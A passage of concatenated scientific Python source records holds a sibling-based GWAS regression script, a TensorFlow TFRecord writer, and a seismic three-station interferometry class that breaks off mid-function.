help='Fit covariates for each locus. 
Default is to fit for null model and project out (mean) and rescale (variance)',\n default=False)\n parser.add_argument('--tau_init',type=float,help='Initial value for ratio between shared family environmental variance and residual variance',\n default=1)\n parser.add_argument('--phen_index',type=int,help='If the phenotype file contains multiple phenotypes, which phenotype should be analysed (default 1, first)',\n default=1)\n parser.add_argument('--min_maf',type=float,help='Ignore SNPs with minor allele frequency below min_maf (default 0.01)',default=0.01)\n parser.add_argument('--missing_char',type=str,help='Missing value string in phenotype file (default NA)',default='NA')\n parser.add_argument('--max_missing',type=float,help='Ignore SNPs with greater percent missing calls than max_missing (default 5)',default=5)\n parser.add_argument('--append',action='store_true',default=False,help='Append results to existing output file with given outprefix (default overwrites existing')\n parser.add_argument('--no_covariate_estimates',action='store_true',default=False,help='Suppress output of covariate effect estimates')\n parser.add_argument('--no_sib',action='store_true',default=False,help='Do not fit indirect genetic effects from sibs')\n parser.add_argument('--fit_VC', action='store_true', default=False,\n help='Fit the variance components for each SNP (default is to use null model MLE)')\n args=parser.parse_args()\n\n ####################### Read in data #########################\n #### Read phenotype ###\n pheno = Pheno(args.phenofile, missing=args.missing_char).read()\n # pheno = Pheno('phenotypes/eduyears_resid.ped', missing='NA').read()\n y = np.array(pheno.val)\n pheno_ids = np.array(pheno.iid)\n if y.ndim == 1:\n pass\n elif y.ndim == 2:\n y = y[:, args.phen_index - 1]\n else:\n raise (ValueError('Incorrect dimensions of phenotype array'))\n # Remove y NAs\n y_not_nan = np.logical_not(np.isnan(y))\n if np.sum(y_not_nan) < y.shape[0]:\n y = y[y_not_nan]\n pheno_ids = pheno_ids[y_not_nan, :]\n pheno_id_dict = {}\n for i in xrange(0, y.shape[0]):\n pheno_id_dict[pheno_ids[i, 1]] = i\n pheno_fams = set(pheno_ids[:, 0])\n print('Number of non-missing phenotype observations: ' + str(y.shape[0]))\n\n ### Get covariates\n ## Get mean covariates\n if not args.covar == None:\n X, X_names, pheno_in = read_covariates(args.covar, pheno_ids, args.missing_char)\n n_X = X.shape[1]\n # Remove rows with missing values\n if np.sum(pheno_in) < y.shape[0]:\n y = y[pheno_in]\n pheno_ids = pheno_ids[pheno_in, :]\n # Normalise non-constant cols\n X_stds = np.std(X[:, 1:n_X], axis=0)\n X[:, 1:n_X] = zscore(X[:, 1:n_X], axis=0)\n else:\n X = np.ones((int(y.shape[0]), 1))\n n_X = 1\n X_names = np.array(['Intercept'])\n\n ### Read pedigree file ###\n ### Load pedigree\n ped = np.loadtxt(args.sibped, dtype='S20', skiprows=1)\n\n ### Create family dictionary\n fams = {}\n fam_ids = np.unique(ped[:, 0])\n for f in fam_ids:\n fams[f] = tuple(ped[ped[:, 0] == f, 1])\n # reverse lookup dict\n sib_fam_dict = {}\n for i in xrange(0, ped.shape[0]):\n sib_fam_dict[ped[i, 1]] = ped[i, 0]\n\n ### Read imputed parental genotypes ###\n print('Reading imputed parental genotype file')\n pargts_f = h5py.File(args.pargts, 'r')\n # get families\n par_fams = np.array(pargts_f['families'])\n # build family dictionary\n par_fam_dict = {}\n for i in range(0, par_fams.shape[0]):\n par_fam_dict[par_fams[i]] = i\n pargts = np.array(pargts_f['imputed_par_gts'])\n par_sid = np.array(pargts_f['sid'])\n par_sid_dict = {}\n for i in range(0, 
par_sid.shape[0]):\n par_sid_dict[par_sid[i]] = i\n\n pargts_f.close()\n\n ### Read sibling genotype file ###\n #### Load genotypes\n gts_f = Bed(args.sibgts)\n gts_ids = gts_f.iid\n # Build dict\n id_dict = {}\n for i in xrange(0, gts_ids.shape[0]):\n id_dict[gts_ids[i, 1]] = i\n sid = gts_f.sid\n sid_length = sid.shape[0]\n sid_dict = {}\n for i in range(0, sid.shape[0]):\n sid_dict[sid[i]] = i\n\n ### Identify siblings without genotyped parents\n # Remove individuals with genotyped parents\n parent_genotyped = np.array([ped[i, 2] in id_dict or ped[i, 3] in id_dict for i in range(0, ped.shape[0])])\n ped = ped[np.logical_not(parent_genotyped), :]\n ped_fams = np.unique(ped[:, 0])\n sibships = {}\n sibship_indices = []\n for f in ped_fams:\n pedf = ped[ped[:, 0] == f, :]\n parent_pairs = np.array([pedf[x, 2] + pedf[x, 3] for x in range(0, pedf.shape[0])])\n unique_parent_pairs = np.unique(parent_pairs)\n pcount = 0\n for par in unique_parent_pairs:\n pmatch = parent_pairs == par\n if np.sum(pmatch) > 1:\n sibs = pedf[pmatch, 1]\n sibs_genotyped = np.array([x in id_dict for x in sibs])\n if np.sum(sibs_genotyped) > 1:\n sibships[f] = sibs[sibs_genotyped]\n sibship_indices = sibship_indices + [id_dict[x] for x in sibs[sibs_genotyped]]\n pcount += 1\n if pcount > 1:\n print('More than one sibship without genotyped parents in family ' + str(\n f) + '. Implies incorrect/unsupported pedigree.')\n\n sibship_indices = np.sort(np.unique(np.array(sibship_indices)))\n\n ### Match SIDs of sibling and par gts ###\n in_par_sid = np.zeros((sid.shape[0]), dtype=bool)\n par_sid_indices = []\n for s in range(0, sid.shape[0]):\n sid_s = sid[s]\n if sid_s in par_sid_dict:\n in_par_sid[s] = True\n par_sid_indices.append(par_sid_dict[sid_s])\n sid = sid[in_par_sid]\n pargts = pargts[:,par_sid_indices]\n par_sid = par_sid[par_sid_indices]\n\n # Read sibling genotypes\n if (np.sum(in_par_sid)*gts_ids.shape[0])<(sibship_indices.shape[0]*sid_length):\n gts = gts_f[:, in_par_sid].read().val\n gts = ma.array(gts, mask=np.isnan(gts), dtype=int)\n gts = gts[sibship_indices,:]\n else:\n gts = gts_f[sibship_indices, :].read().val\n gts = ma.array(gts, mask=np.isnan(gts), dtype=int)\n gts = gts[:, in_par_sid]\n pos = gts_f.pos[in_par_sid, 2]\n\n # rebuild ID dictionary\n gts_ids = gts_ids[sibship_indices, :]\n # Build dict\n id_dict = {}\n for i in xrange(0, gts_ids.shape[0]):\n id_dict[gts_ids[i, 1]] = i\n\n ### Construct genetic covariate matrix\n print('Forming family-wise genotype matrix')\n if args.no_sib:\n gsize = 2\n else:\n gsize = 3\n G = ma.array(np.zeros((gts.shape[0], gsize, gts.shape[1]), dtype=np.float32),\n mask=np.zeros((gts.shape[0], gsize, gts.shape[1]), dtype=bool))\n y_new = np.zeros((sibship_indices.shape[0]))\n y_new[:] = np.nan\n X_new = np.zeros((sibship_indices.shape[0], X.shape[1]))\n X_new[:] = np.nan\n fam_labels = np.zeros((sibship_indices.shape[0]), dtype='S20')\n G[:, 0, :] = gts\n for i in xrange(0, sibship_indices.shape[0]):\n fam_i = sib_fam_dict[gts_ids[i, 1]]\n fam_labels[i] = fam_i\n # Find siblings\n if not args.no_sib:\n sibs_i = sibships[fam_i]\n sibs_i = np.delete(sibs_i, np.where(sibs_i == gts_ids[i, 1])[0][0])\n sibs_i = np.array([id_dict[x] for x in sibs_i])\n G[i, 1, :] = ma.mean(gts[sibs_i, :], axis=0)\n # Get imputed parental genotype\n G[i, gsize - 1, :] = pargts[par_fam_dict[fam_i], :]\n G.mask[i, gsize - 1, :] = np.isnan(pargts[par_fam_dict[fam_i], :])\n # Get phenotype\n if gts_ids[i, 1] in pheno_id_dict:\n pindex = pheno_id_dict[gts_ids[i, 1]]\n y_new[i] = y[pindex]\n 
X_new[i, :] = X[pindex, :]\n\n del gts\n del pargts\n y = y_new\n X = X_new\n\n y_not_nan = np.logical_not(np.isnan(y))\n y = y[y_not_nan]\n X = X[y_not_nan, :]\n G = G[y_not_nan, :]\n fam_labels = fam_labels[y_not_nan]\n\n print(str(y.shape[0]) + ' genotyped individuals with phenotype data and imputed parental genotyped')\n\n ######### Initialise output files ######\n######### Fit Null Model ##########\n ## Get initial guesses for null model\n print('Fitting Null Model')\n # Optimize null model\n sigma_2_init = np.var(y)*args.tau_init/(1+args.tau_init)\n null_model = sibreg.model(y, X, fam_labels)\n null_optim = null_model.optimize_model(np.array([sigma_2_init,args.tau_init]))\n print('Within family variance estimate: '+str(round(null_optim['sigma2']/null_optim['tau'],4)))\n print('Residual variance estimate: ' + str(round(null_optim['sigma2'],4)))\n null_alpha = null_model.alpha_mle(null_optim['tau'],null_optim['sigma2'],compute_cov = True)\n ## Record fitting of null model\n if not args.append and not args.no_covariate_estimates and args.covar is not None:\n # Get print out for fixed mean effects\n alpha_out = np.zeros((n_X, 2))\n alpha_out[:, 0] = null_alpha[0]\n alpha_out[:, 1] = np.sqrt(np.diag(null_alpha[1]))\n # Rescale\n if n_X > 1:\n for i in xrange(0, 2):\n alpha_out[1:n_X, i] = alpha_out[1:n_X, i] / X_stds\n np.savetxt(args.outprefix + '.null_covariate_effects.txt',\n np.hstack((X_names.reshape((n_X, 1)), np.array(alpha_out, dtype='S20'))),\n delimiter='\\t', fmt='%s')\n\n # Fit SNP specific models\n ### Project out mean covariates\n if not args.fit_covariates:\n # Residual y\n y=y-X.dot(null_alpha[0])\n # Reformulate fixed_effects\n X=np.ones((X.shape[0],1))\n n_X=1\n\n ## Output file\n outfile = h5py.File(args.outprefix+'.hdf5','w')\n outfile['sid'] = sid\n if args.no_sib:\n X_length = n_X + 2\n else:\n X_length = n_X + 3\n outfile.create_dataset('xtx',(G.shape[2],X_length,X_length),dtype = 'f',chunks = True, compression = 'gzip', compression_opts=9)\n outfile.create_dataset('xty', (G.shape[2], X_length), dtype='f', chunks=True, compression='gzip',\n compression_opts=9)\n\n ############### Loop through loci and fit models ######################\n print('Fitting models for genome-wide SNPs')\n # Optimize model for SNP\n freqs = ma.mean(G[:,0,:],axis=0)/2.0\n missingness = ma.mean(G.mask[:,0,:],axis=0)\n N_L = np.zeros((G.shape[2]), dtype=int)\n for loc in xrange(0,G.shape[2]):\n if freqs[loc] > args.min_maf and freqs[loc] < (1-args.min_maf) and (100*missingness[loc]) < args.max_missing:\n # Find NAs\n not_nans = np.sum(G[:, :, loc].mask, axis=1) == 0\n n_l = np.sum(not_nans)\n N_L[loc] = n_l\n X_l = np.ones((n_l, X_length), dtype=np.float64)\n X_l[:, 0:n_X] = X[not_nans, :]\n X_l[:, n_X:X_length] = G[not_nans, :, loc]\n model_l = sibreg.model(y[not_nans], X_l, fam_labels[not_nans])\n if args.fit_VC:\n optim_l = model_l.optimize_model(np.array([null_optim['sigma2'], null_optim['tau']]))\n if optim_l['success']:\n alpha_l = model_l.alpha_mle(optim_l['tau'], optim_l['sigma2'], compute_cov=True, xtx_out= True)\n else:\n raise(ValueError('Maximisation of likelihood failed for for ' + sid[loc]))\n else:\n alpha_l = model_l.alpha_mle(null_optim['tau'], null_optim['sigma2'], compute_cov=True, xtx_out= True)\n outfile['xtx'][loc,:,:] = alpha_l[0]\n outfile['xty'][loc,:] = alpha_l[1]\n else:\n outfile['xtx'][loc, :, :] = np.nan\n outfile['xty'][loc, :] = np.nan\n outfile['sigma2'] = null_optim['sigma2']\n outfile['tau'] = null_optim['tau']\n outfile['N_L'] = N_L\n outfile['freqs'] = 
freqs\n    outfile.close()","sub_path":"sibreg/bin/pGWAS.py","file_name":"pGWAS.py","file_ext":"py","file_size_in_byte":14249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"379692385","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport tensorflow as tf\n\n\ndef serialize(label, tokens, length, weight):\n    seq = tf.train.SequenceExample()\n\n    seq.context.feature['label'].int64_list.value.append(label)\n    seq.context.feature['length'].int64_list.value.append(length)\n    seq.context.feature['weight'].int64_list.value.append(weight)\n\n    _tokens = seq.feature_lists.feature_list['tokens']\n    for t in tokens:\n        _tokens.feature.add().int64_list.value.append(t)\n    return seq.SerializeToString()\n\n\ndef write_records(path, labels, inputs, lengths, weights):\n    writer = tf.python_io.TFRecordWriter(path)\n    for label, tokens, length, weight in zip(labels, inputs, lengths, weights):\n        writer.write(serialize(label, tokens, length, weight))\n    writer.close()\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"566796858","text":"# -*- coding: utf-8 -*-\n\"\"\"\ninternal functions and classes for three station interferometry\n\n:Copyright:\n    Author: Lili Feng\n    email: lfeng1011@gmail.com\n\"\"\"\nimport surfpy.aftan.pyaftan as pyaftan\n\nimport numpy as np\nfrom numba import jit, float32, int32, boolean, float64, int64\nimport numba\nimport pyfftw\nimport obspy\nimport os\nimport multiprocessing\nimport obspy.signal.filter\nimport scipy.signal\nimport scipy.interpolate\nimport glob\nimport time\n\n\n@numba.jit(numba.types.Tuple((numba.float32[:], numba.int64[:], numba.int64, numba.int64, numba.int64))\\\n    (numba.int64, numba.float32[:], numba.float32[:], numba.float32), nopython=True)\ndef _trigger(nf, phvel, om , tresh):\n    \"\"\"Detect jumps in dispersion curve\n    \"\"\"\n    hh1 = om[1:nf-1] - om[:nf-2]\n    hh2 = om[2:] - om[1:nf-1]\n    hh3 = hh1 + hh2\n    r = (phvel[:nf-2]/hh1 - (1./hh1+1/hh2)*phvel[1:nf-1] + phvel[2:]/hh2)*hh3/4.*100.\n    ftrig = np.zeros(nf, dtype=np.float32)\n    ftrig[1:nf-1] = r\n    # second derivative\n    ftrig[:-1] = ftrig[:-1] - ftrig[1:]\n    trig = np.zeros(nf, dtype=np.int64)\n    ierr = 0\n    for i in range(nf):\n        if i == 0: continue\n        if i == (nf-1): break\n        if ftrig[i] > tresh:\n            trig[i] = 1\n            ierr = 1\n        elif ftrig[i] < -tresh:\n            trig[i] = -1\n            ierr = 1\n    ist = 0\n    ibe = 0\n    # determine the longest length\n    if ierr != 0:\n        for k in range(nf):\n            if trig[k] != 0:\n                if (k - ibe) > (ibe - ist):\n                    ist = ibe\n                    ibe = k\n            else:\n                if k == (nf - 1):\n                    if (k - ibe) > (ibe - ist):\n                        ist = ibe\n                        ibe = k\n    return ftrig, trig, ierr, ist, ibe\n\n@numba.jit(numba.types.Tuple((numba.int64, numba.int64))(numba.int64[:]), nopython=True)\ndef _get_pers_ind(Nm):\n    \"\"\"Find the longest period range with nonzero measurements\n    \"\"\"\n    nf = Nm.size\n    ind0= np.where(Nm == 0)[0]\n    ist = 0\n    ibe = 0\n    for i in range(ind0.size):\n        if i == 0:\n            ist = 0\n            ibe = ind0[i] - 1\n            continue\n        if (ind0[i] - ind0[i-1]) > (ibe - ist):\n            ist = ind0[i-1] + 1\n            ibe = ind0[i] - 1 \n    if (nf - 1 - ind0[-1]) > (ibe - ist):\n        ist = ind0[-1] + 1\n        ibe = nf - 1 \n    return ist, ibe\n\ndef _tshift_fft(data, dt, pers, phvel, iphase, d):\n    \"\"\"positive means delaying the waveform\n    \"\"\"\n    npts = data.size\n    Np2 = int(max(1<<(npts-1).bit_length(), 2**12))\n    Xf = np.fft.rfft(data, n=Np2)\n    freq =
1./dt/Np2*np.arange((Np2/2+1), dtype = float)\n infreq = 1./pers[::-1]\n fitp = scipy.interpolate.interp1d(infreq, phvel[::-1], kind='linear', fill_value='extrapolate', assume_sorted=True )\n C = fitp(freq)\n # d < 0 : wave arrives earlier than expected, need to shift to right, tshift = -d/C > 0.\n # d > 0 : vice versa\n tshift = -d/C \n ph_shift= np.exp(-2j*np.pi*freq*tshift - 1j*iphase)\n Xf2 = Xf*ph_shift\n return np.real(np.fft.irfft(Xf2)[:npts])\n\nclass c3_pair(object):\n \"\"\" A class for ambient noise three station interferometry\n =================================================================================================================\n ::: parameters :::\n stacode1, netcode1 - station/network code for station 1\n stacode2, netcode2 - station/network code for station 2\n \n =================================================================================================================\n \"\"\"\n def __init__(self, datadir, outdir, stacode1, netcode1, stla1, stlo1, stacode2, netcode2, stla2, stlo2,\\\n channel, chan_types= [], StationInv = [], alpha = 0.01, vmin = 1., vmax = 5., Tmin = 5.,\\\n Tmax = 150., bfact_dw = 1., efact_dw = 1., dthresh = 5., inftan = pyaftan.InputFtanParam(), \\\n basic1=True, basic2=True, pmf1=True, pmf2=True, f77=True, prephdir='', pers = [],\\\n snr_thresh = 10., Ntrace_min = 5, nfmin = 5, jump_thresh = 3., phvel_ref = [], pers_ref = [], prefer_c3_disp = True):\n self.datadir = datadir\n self.outdir = outdir\n self.stacode1 = stacode1\n self.netcode1 = netcode1\n self.stla1 = stla1\n self.stlo1 = stlo1\n self.stacode2 = stacode2\n self.netcode2 = netcode2\n self.stla2 = stla2\n self.stlo2 = stlo2\n self.channel = channel\n self.chan_types = chan_types # not used for now\n self.StationInv = StationInv\n # parameters for interferometry data processing\n self.alpha = alpha\n self.vmin = vmin\n self.vmax = vmax\n self.Tmin = Tmin\n self.Tmax = Tmax\n self.bfact_dw = bfact_dw\n self.efact_dw = efact_dw\n self.dthresh = dthresh\n # parameters for aftan\n self.inftan = inftan\n self.basic1 = basic1\n self.basic2 = basic2\n self.pmf1 = pmf1\n self.pmf2 = pmf2\n self.f77 = f77\n self.prephdir = prephdir\n if len(pers) == 0:\n self.pers = np.append( np.arange(18.)*2.+6., np.arange(4.)*5.+45.)\n else:\n self.pers = pers\n # aftan stack\n self.snr_thresh = snr_thresh \n self.nfmin = nfmin\n self.Ntrace_min = Ntrace_min\n self.jump_thresh= jump_thresh\n # reference dispersion curves, used for phase correction\n if len(phvel_ref) != len(pers_ref):\n raise ValueError('length of refernce phase speed and periods must be consistent')\n self.phvel_ref = phvel_ref\n self.pers_ref = pers_ref\n self.prefer_c3_disp = prefer_c3_disp\n return\n \n def print_info(self, process_id):\n \"\"\"print the informations of this pair\n \"\"\"\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' + self.stacode2\n print ('--- '+ staid1+'_'+staid2+' processID = '+str(process_id))\n \n def direct_wave_interfere(self, process_id= '', verbose = False, verbose2= False):\n \"\"\"direct wave interferometry\n \"\"\"\n if verbose:\n self.print_info(process_id=process_id)\n chan1 = self.channel[0]\n chan2 = self.channel[1]\n dist0, az0, baz0= obspy.geodetics.gps2dist_azimuth(self.stla1, self.stlo1, self.stla2, self.stlo2)\n dist0 /= 1000.\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' 
+ self.stacode2\n xcorrpattern = self.datadir + '/COR/'+staid1+'/COR_'+staid1+'_??'+chan1+'_'+staid2+'_??'+chan2+'.SAC'\n if len(glob.glob(xcorrpattern)) > 0:\n outdir = self.outdir + '/SYNC_C3/'+staid1\n else:\n outdir = self.outdir + '/ASYNC_C3/'+staid1\n Ntraces = 0\n # loop over source stations\n for srcnet in self.StationInv:\n for srcsta in srcnet:\n sourceid = srcnet.code+'.'+srcsta.code\n if sourceid == staid1 or sourceid == staid2:\n continue\n evla = srcsta.latitude\n evlo = srcsta.longitude\n dist1, az1, baz1= obspy.geodetics.gps2dist_azimuth(evla, evlo, self.stla1, self.stlo1)\n dist2, az2, baz2= obspy.geodetics.gps2dist_azimuth(evla, evlo, self.stla2, self.stlo2)\n dist1 /= 1000.\n dist2 /= 1000.\n dhyp = dist0 - abs(dist1 - dist2)\n dell = dist1 + dist2 - dist0\n if abs(dhyp - dell) < self.dthresh:\n if verbose2:\n print ('!!! SKIP c3: %s_%s source: %s' %(staid1, staid2, sourceid))\n continue\n # not in stationary phase zone\n if min(dhyp, dell) > dist0*self.alpha:\n continue\n if dell < dhyp:\n iellhyp = 1\n else:\n iellhyp = 2\n # load xcorr data\n # station 1\n if staid1 < sourceid:\n datadir1 = self.datadir + '/COR/'+staid1\n fpattern1 = datadir1 + '/COR_'+staid1+'_??'+chan1+'_'+sourceid+'_??'+chan1+'.SAC'\n else:\n datadir1 = self.datadir + '/COR/'+sourceid\n fpattern1 = datadir1 + '/COR_'+sourceid+'_??'+chan1+'_'+staid1+'_??'+chan1+'.SAC'\n flst1 = glob.glob(fpattern1)\n if len(flst1) == 0:\n continue\n fname1 = flst1[0]\n # station 2\n if staid2 < sourceid:\n datadir2 = self.datadir + '/COR/'+staid2\n fpattern2 = datadir2 + '/COR_'+staid2+'_??'+chan2+'_'+sourceid+'_??'+chan2+'.SAC'\n else:\n datadir2 = self.datadir + '/COR/'+sourceid\n fpattern2 = datadir2 + '/COR_'+sourceid+'_??'+chan2+'_'+staid2+'_??'+chan2+'.SAC'\n flst2 = glob.glob(fpattern2)\n if len(flst2) == 0:\n continue\n fname2 = flst2[0]\n # load data, get symmetric components\n tr1 = obspy.read(fname1)[0]\n outsactr = obspy.io.sac.SACTrace.from_obspy_trace(tr1.copy())\n tr1 = pyaftan.aftantrace(tr1.data, tr1.stats)\n tr1.makesym()\n tr2 = obspy.read(fname2)[0]\n tr2 = pyaftan.aftantrace(tr2.data, tr2.stats)\n tr2.makesym()\n if abs(tr1.stats.delta - tr2.stats.delta) > min(tr1.stats.delta/1000., tr2.stats.delta/1000.):\n raise AttributeError('!!! 
xcorr must have the same sampling rate!')\n if iellhyp == 1:\n outdata = scipy.signal.convolve(tr1.data, tr2.data, mode='full', method='fft')\n else:\n outdata = scipy.signal.correlate(tr1.data, tr2.data, mode='full', method='fft')\n # data\n outsactr.data = outdata\n #==================\n # update headers\n #==================\n if iellhyp == 1:\n outsactr.b += tr1.stats.sac.e\n outsactr.kuser0 = self.netcode1\n outsactr.kevnm = self.stacode1\n outsactr.knetwk = self.netcode2\n outsactr.kstnm = self.stacode2\n outsactr.evla = self.stla1\n outsactr.evlo = self.stlo1\n outsactr.stla = self.stla2\n outsactr.stlo = self.stlo2\n outsactr.dist = dist0\n outsactr.az = az0\n outsactr.baz = baz0\n # source station\n outsactr.kuser1 = srcnet.code\n outsactr.kuser2 = srcsta.code\n if iellhyp == 1:\n outsactr.user0 = dell\n else:\n outsactr.user0 = -dhyp\n outsactr.user1 = srcsta.latitude\n outsactr.user2 = srcsta.longitude\n outsactr.kcmpnm = self.channel\n # save data\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n if iellhyp == 1:\n outfname= outdir + '/C3_'+ staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_'+sourceid+'_ELL.SAC'\n else:\n outfname= outdir + '/C3_'+ staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_'+sourceid+'_HYP.SAC'\n outsactr.write(outfname)\n Ntraces += 1\n return Ntraces\n \n def direct_wave_aftan(self, process_id= '', verbose = False):\n \"\"\"direct wave aftan\n \"\"\"\n inftan = self.inftan\n if verbose:\n self.print_info(process_id = process_id)\n chan1 = self.channel[0]\n chan2 = self.channel[1]\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' 
+ self.stacode2\n if not os.path.isdir(self.datadir + '/logs_dw_aftan/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_aftan/'+ staid1)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(self.datadir + '/logs_dw_aftan/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_aftan/'+ staid1)\n break\n except OSError:\n pass\n i += 1\n logfname = self.datadir + '/logs_dw_aftan/'+ staid1 + '/' + staid1 +'_'+staid2+'.log'\n with open(logfname, 'w') as fid:\n fid.writelines('RUNNING\\n')\n if len(glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*ELL.SAC')) > 0 or \\\n len(glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*HYP.SAC')) > 0:\n is_sync = True\n elif len(glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*ELL.SAC')) > 0 or \\\n len(glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*HYP.SAC')) > 0:\n is_sync = False\n else:\n with open(logfname, 'w') as fid:\n fid.writelines('NODATA\\n')\n return \n dist0, az0, baz0= obspy.geodetics.gps2dist_azimuth(self.stla1, self.stlo1, self.stla2, self.stlo2)\n dist0 /= 1000.\n if is_sync:\n ellflst = glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*ELL.SAC')\n hyplst = glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*HYP.SAC')\n else:\n ellflst = glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*ELL.SAC')\n hyplst = glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*HYP.SAC')\n # source station in elliptical stationary phase zone\n ell_piover4 = -2.\n for ellfname in ellflst:\n elltr = obspy.read(ellfname)[0]\n ell_atr = pyaftan.aftantrace(elltr.data, elltr.stats)\n ell_atr.stats.sac.dist = dist0 + ell_atr.stats.sac.user0 # distance correction\n phvelname = self.prephdir + \"/%s.%s.pre\" %(staid1, staid2)\n if not os.path.isfile(phvelname):\n print ('*** WARNING: '+ phvelname+' not exists!')\n continue\n # aftan analysis\n if self.f77:\n ell_atr.aftanf77(pmf=inftan.pmf, piover4 = ell_piover4, vmin=inftan.vmin, vmax=inftan.vmax, tmin=inftan.tmin, tmax=inftan.tmax,\n tresh=inftan.tresh, ffact=inftan.ffact, taperl=inftan.taperl, snr=inftan.snr, fmatch=inftan.fmatch, nfin=inftan.nfin,\n npoints=inftan.npoints, perc=inftan.perc, phvelname=phvelname)\n else:\n ell_atr.aftan(pmf=inftan.pmf, piover4 = ell_piover4, vmin=inftan.vmin, vmax=inftan.vmax, tmin=inftan.tmin, tmax=inftan.tmax,\n tresh=inftan.tresh, ffact=inftan.ffact, taperl=inftan.taperl, snr=inftan.snr, fmatch=inftan.fmatch, nfin=inftan.nfin,\n npoints=inftan.npoints, perc=inftan.perc, phvelname=phvelname)\n # SNR\n ell_atr.get_snr(ffact = inftan.ffact)\n # save aftan\n outdispfname = ellfname[:-4] + '.npz'\n outarr = np.array([dist0, ell_atr.stats.sac.user0])\n ell_atr.ftanparam.write_npy(outfname = outdispfname, outarr = outarr)\n # source station in hypobolic stationary phase zone\n hyp_piover4 = 0.\n for hypfname in hyplst:\n hyptr = obspy.read(hypfname)[0]\n hyp_atr = pyaftan.aftantrace(hyptr.data, hyptr.stats)\n hyp_atr.makesym()\n hyp_atr.stats.sac.dist = dist0 + hyp_atr.stats.sac.user0 # distance correction\n phvelname = self.prephdir + \"/%s.%s.pre\" %(staid1, staid2)\n if not os.path.isfile(phvelname):\n print ('*** WARNING: '+ phvelname+' not exists!')\n continue\n # 
aftan analysis\n if self.f77:\n hyp_atr.aftanf77(pmf=inftan.pmf, piover4 = hyp_piover4, vmin=inftan.vmin, vmax=inftan.vmax, tmin=inftan.tmin, tmax=inftan.tmax,\n tresh=inftan.tresh, ffact=inftan.ffact, taperl=inftan.taperl, snr=inftan.snr, fmatch=inftan.fmatch, nfin=inftan.nfin,\n npoints=inftan.npoints, perc=inftan.perc, phvelname=phvelname)\n else:\n hyp_atr.aftan(pmf=inftan.pmf, piover4 = hyp_piover4, vmin=inftan.vmin, vmax=inftan.vmax, tmin=inftan.tmin, tmax=inftan.tmax,\n tresh=inftan.tresh, ffact=inftan.ffact, taperl=inftan.taperl, snr=inftan.snr, fmatch=inftan.fmatch, nfin=inftan.nfin,\n npoints=inftan.npoints, perc=inftan.perc, phvelname=phvelname)\n # SNR\n hyp_atr.get_snr(ffact = inftan.ffact)\n # save aftan\n outdispfname = hypfname[:-4] + '.npz'\n outarr = np.array([dist0, hyp_atr.stats.sac.user0])\n hyp_atr.ftanparam.write_npy(outfname = outdispfname, outarr = outarr)\n with open(logfname, 'w') as fid:\n fid.writelines('SUCCESS\\n')\n # # # if len(ellflst) > 0 or len(hyplst) > 0:\n # # # with open(logfname, 'w') as fid:\n # # # fid.writelines('SUCCESS\\n')\n # # # else:\n # # # with open(logfname, 'w') as fid:\n # # # fid.writelines('NODATA\\n')\n return \n \n def direct_wave_stack_disp(self, process_id= '', verbose = False):\n \"\"\"stack dispersion results\n \"\"\"\n if verbose:\n self.print_info(process_id = process_id)\n chan1 = self.channel[0]\n chan2 = self.channel[1]\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' + self.stacode2\n if len(glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.npz')) > 0:\n is_sync = True\n npzfilelst = glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.npz')\n elif len(glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.npz')) > 0:\n is_sync = False\n npzfilelst = glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.npz')\n else:\n return\n dist0, az0, baz0= obspy.geodetics.gps2dist_azimuth(self.stla1, self.stlo1, self.stla2, self.stlo2)\n dist0 /= 1000.\n #======================\n # load raw aftan data\n #======================\n raw_pers = []\n raw_grvel = []\n raw_phvel = []\n raw_snr = []\n distances = []\n Tmin = 999.\n Tmax = -999.\n Naftan = 0\n for npzfname in npzfilelst:\n fparam = pyaftan.ftanParam()\n outarr = fparam.load_npy(npzfname)\n if fparam.nfout2_2 == 0:\n continue\n if np.any(np.isnan(fparam.arr2_2[8, 